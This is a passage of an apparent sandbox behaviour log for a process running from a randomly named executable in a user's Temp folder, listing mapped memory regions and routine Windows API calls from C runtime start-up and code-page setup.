pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 694 start_va = 0x73840000 end_va = 0x73874fff entry_point = 0x73840000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\SysWOW64\\mstask.dll" (normalized: "c:\\windows\\syswow64\\mstask.dll") Region: id = 695 start_va = 0x27a0000 end_va = 0x27a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 696 start_va = 0x733c0000 end_va = 0x7355dfff entry_point = 0x733c0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 697 start_va = 0x4fd0000 end_va = 0x4fd0fff entry_point = 0x4fd0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 698 start_va = 0x4fe0000 end_va = 0x501ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 699 start_va = 0x5020000 end_va = 0x5021fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005020000" filename = "" Region: id = 700 start_va = 0x4fd0000 end_va = 0x4fd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fd0000" filename = "" Region: id = 701 start_va = 0x4fd0000 end_va = 0x4fd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fd0000" filename = "" Region: id = 702 start_va = 0x58b0000 end_va = 0x58b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000058b0000" filename = "" Region: id = 703 start_va = 0x58b0000 end_va = 0x58b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000058b0000" filename = "" Region: id = 704 start_va = 0x58b0000 end_va = 0x58b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000058b0000" filename = "" Region: id = 705 start_va = 0x58b0000 end_va = 0x58b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000058b0000" filename = "" Region: id = 706 start_va = 0x58b0000 end_va = 0x58b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000058b0000" filename = "" Region: id = 725 start_va = 0x5a00000 end_va = 0x5bfffff entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 726 start_va = 0x5c00000 end_va = 0x5c80fff entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Thread: id = 33 os_tid = 0xaac [0037.193] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xf7d3d60, dwHighDateTime=0x1d357fe)) [0037.193] GetCurrentProcessId () returned 0xaa8 [0037.193] GetCurrentThreadId () returned 0xaac [0037.193] GetTickCount () returned 0x18b0f [0037.193] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=385194550) returned 1 [0037.193] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x1002002f)) [0037.193] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0037.203] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76600000 [0037.203] GetProcAddress (hModule=0x76600000, lpProcName="FlsAlloc") returned 0x76614f2b [0037.204] GetProcAddress (hModule=0x76600000, lpProcName="FlsGetValue") returned 0x76611252 [0037.204] GetProcAddress (hModule=0x76600000, lpProcName="FlsSetValue") returned 0x76614208 [0037.204] GetProcAddress (hModule=0x76600000, lpProcName="FlsFree") returned 0x7661359f [0037.204] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76600000 [0037.204] GetCurrentThreadId () returned 0xaac [0037.205] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1001b787, hStdOutput=0x1001bac0, hStdError=0x22107d0)) [0037.205] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0037.205] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0037.205] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0037.205] SetHandleCount (uNumber=0x20) returned 0x20 [0037.205] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe\" " [0037.205] GetEnvironmentStringsW () returned 0x58d180* [0037.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0037.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x22111f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0037.205] FreeEnvironmentStringsW (penv=0x58d180) returned 1 [0037.205] GetLastError () returned 0x0 [0037.205] SetLastError (dwErrCode=0x0) [0037.205] GetLastError () returned 0x0 [0037.205] SetLastError (dwErrCode=0x0) [0037.205] GetLastError () returned 0x0 [0037.205] SetLastError (dwErrCode=0x0) [0037.205] GetACP () returned 0x4e4 [0037.205] GetLastError () returned 0x0 [0037.205] SetLastError (dwErrCode=0x0) [0037.205] IsValidCodePage (CodePage=0x4e4) returned 1 [0037.205] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0037.205] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0037.205] GetLastError () returned 0x0 [0037.205] SetLastError (dwErrCode=0x0) [0037.205] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0037.206] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0037.206] GetLastError () returned 0x0 [0037.206] SetLastError (dwErrCode=0x0) [0037.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೵ᡡ⎘ဂĀ") returned 256 [0037.206] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೵ᡡ⎘ဂĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0037.206] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೵ᡡ⎘ဂĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0037.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿK=W\x19\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0037.206] GetLastError () returned 0x0 [0037.206] SetLastError (dwErrCode=0x0) [0037.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೵ᡡ⎘ဂĀ") returned 256 [0037.206] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೵ᡡ⎘ဂĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0037.206] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೵ᡡ⎘ဂĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0037.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿK=W\x19\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0037.206] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10031588, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pst790mv.exe")) returned 0x3d [0037.206] GetLastError () returned 0x0 [0037.206] SetLastError (dwErrCode=0x0) [0037.206] GetLastError () returned 0x0 [0037.206] SetLastError (dwErrCode=0x0) [0037.206] GetLastError () returned 0x0 [0037.206] SetLastError (dwErrCode=0x0) [0037.206] GetLastError () returned 0x0 [0037.206] SetLastError (dwErrCode=0x0) [0037.206] GetLastError () returned 0x0 [0037.206] SetLastError (dwErrCode=0x0) [0037.206] GetLastError () returned 0x0 [0037.206] SetLastError (dwErrCode=0x0) [0037.206] GetLastError () returned 0x0 [0037.206] SetLastError (dwErrCode=0x0) [0037.206] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.207] GetLastError () returned 0x0 [0037.207] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.208] SetLastError (dwErrCode=0x0) [0037.208] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] 